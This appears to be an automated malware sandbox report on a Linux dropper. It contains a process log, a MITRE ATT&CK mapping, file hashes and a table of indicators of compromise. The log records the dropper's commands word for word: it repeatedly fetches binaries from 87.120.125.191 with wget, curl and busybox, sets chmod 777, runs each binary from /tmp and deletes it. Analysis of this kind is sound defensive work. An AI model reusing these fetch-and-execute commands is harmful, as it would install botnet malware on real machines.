  rm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:934
- /usr/bin/wget
  wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:935
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:937
- /bin/chmod
  chmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - File and Directory Permissions Modification
  PID:938
- /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  ./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Executes dropped EXE
  PID:939
- /bin/rm
  rm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:940
- /usr/bin/wget
  wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:941
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:942
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:943
- /bin/chmod
  chmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  ./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:946
- /usr/bin/wget
  wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:947
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:949
- /bin/chmod
  chmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  ./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Executes dropped EXE
  PID:951
- /bin/rm
  rm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:952
- /usr/bin/wget
  wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:953
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:954
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:955
- /bin/chmod
  chmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  ./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Executes dropped EXE
  PID:957
- /bin/rm
  rm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:958
- /usr/bin/wget
  wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:959
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:961
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:962
- /bin/chmod
  chmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - File and Directory Permissions Modification
  PID:963
- /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  ./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Executes dropped EXE
  PID:964
- /bin/rm
  rm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:965
- /usr/bin/wget
  wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:966
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:967
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:968
- /bin/chmod
  chmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - File and Directory Permissions Modification
  PID:969
- /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  ./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Executes dropped EXE
  PID:970
- /bin/rm
  rm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:971

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	727	9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	735	yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	745	CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	768	uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	796	IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	807	jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	813	qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	826	CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	846	rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	861	yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	867	Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	873	e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	879	GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	885	V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	891	rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	897	jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	903	qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	909	CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	915	V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	921	yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	927	Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	933	e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	939	GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	945	uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	951	9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	957	yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	964	CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	970	IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8